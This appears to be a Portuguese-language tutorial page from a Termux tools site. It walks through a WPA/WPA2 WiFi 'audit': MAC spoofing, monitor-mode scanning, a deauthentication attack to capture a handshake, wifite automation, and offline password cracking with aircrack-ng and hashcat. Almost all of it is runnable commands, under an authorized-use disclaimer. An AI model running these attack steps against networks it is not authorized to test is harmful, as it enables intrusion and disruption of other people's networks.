Tank · Code Alliance Developers
Termux Arsenalby Tank · Code Alliance

⚠ Uso autorizado/educacional. Executar contra terceiros sem permissão é crime.

← planosWiFi

Auditoria de Rede WiFi

Avaliar a segurança de uma rede WiFi própria (ou autorizada) identificando pontos de acesso, capturando handshakes WPA/WPA2 e testando a força da senha. Combina reconhecimento, captura e cracking.

Checklist de pré-requisitos

Marque o que já rodou no seu Termux. Seu progresso fica salvo neste dispositivo.

0/6
  • $ pkg update && pkg upgrade -y
  • $ termux-setup-storage

Ferramentas usadas

Mapa de etapas

Ordem recomendada e o que cada etapa precisa antes de rodar.

  1. 1. Preparação

    Anonimizar o MAC e preparar a interface

    depende de:

  2. 2. Reconhecimento

    Listar redes próximas e identificar o alvo

    depende de: #1

  3. 3. Captura de Handshake

    Capturar o handshake WPA quando um cliente reconectar

    depende de: #2

  4. 4. Automação (alternativa)

    Fazer todo o processo de captura/ataque com um único utilitário

    depende de: #1

  5. 5. Conversão do .cap para formato hashcat

    Converter o handshake capturado para o formato moderno (-m 22000)

    depende de: #3

  6. 6. Cracking offline

    Tentar recuperar a senha do handshake capturado

    depende de: #5

Passo a passo

  1. 1. Preparação

    Anonimizar o MAC e preparar a interface

    ✓ Checagens antes de executar

    • ·Você tem root? Rode: su -c id
    • ·A interface wlan0 existe? Rode: ip link
    • ·Anote o MAC atual: ip link show wlan0
    $ macchanger -r wlan0

    dica · Sempre anote o MAC original antes de mudar.

  2. 2. Reconhecimento

    Listar redes próximas e identificar o alvo

    depende de: #1 Preparação

    ✓ Checagens antes de executar

    • ·Mate processos que travam o modo monitor: airmon-ng check kill
    • ·Confirme criação de wlan0mon após o start: iwconfig
    $ airmon-ng start wlan0
    $ airodump-ng wlan0mon

    dica · Anote BSSID, canal e clientes conectados ao alvo.

  3. 3. Captura de Handshake

    Capturar o handshake WPA quando um cliente reconectar

    depende de: #2 Reconhecimento

    ✓ Checagens antes de executar

    • ·Você já tem BSSID, canal e MAC do cliente do passo 2?
    • ·Há espaço em disco: df -h $PREFIX
    • ·Aguarde a flag 'WPA handshake: <BSSID>' no topo do airodump antes de seguir
    $ airodump-ng -c <canal> --bssid <BSSID> -w captura wlan0mon
    $ aireplay-ng -0 5 -a <BSSID> -c <CLIENTE> wlan0mon
  4. 4. Automação (alternativa)

    Fazer todo o processo de captura/ataque com um único utilitário

    depende de: #1 Preparação

    ✓ Checagens antes de executar

    • ·Wifite instalado? wifite --help
    • ·Pare serviços conflitantes: airmon-ng check kill
    $ wifite --kill

    dica · Wifite orquestra airodump/aireplay e tenta WPS automaticamente.

  5. 5. Conversão do .cap para formato hashcat

    Converter o handshake capturado para o formato moderno (-m 22000)

    depende de: #3 Captura de Handshake

    ✓ Checagens antes de executar

    • ·Arquivo captura-01.cap existe e não está vazio: ls -lh captura-01.cap
    • ·hcxpcapngtool disponível: command -v hcxpcapngtool
    $ pkg install hcxtools -y
    $ hcxpcapngtool captura-01.cap -o captura.hc22000

    dica · Passo obrigatório antes do hashcat: o .cap bruto não é aceito pelo modo -m 22000.

  6. 6. Cracking offline

    Tentar recuperar a senha do handshake capturado

    depende de: #5 Conversão do

    ✓ Checagens antes de executar

    • ·wordlist.txt existe e tem candidatos plausíveis: wc -l wordlist.txt
    • ·Bateria > 50% e celular conectado ao carregador
    • ·captura.hc22000 não está vazio antes de iniciar hashcat
    $ aircrack-ng captura-01.cap -w wordlist.txt
    $ hashcat -m 22000 captura.hc22000 wordlist.txt

Resultados esperados

  • Lista de APs no entorno com canal/criptografia
  • Arquivo .cap com handshake válido
  • Veredito sobre a robustez da senha WiFi

Outros planos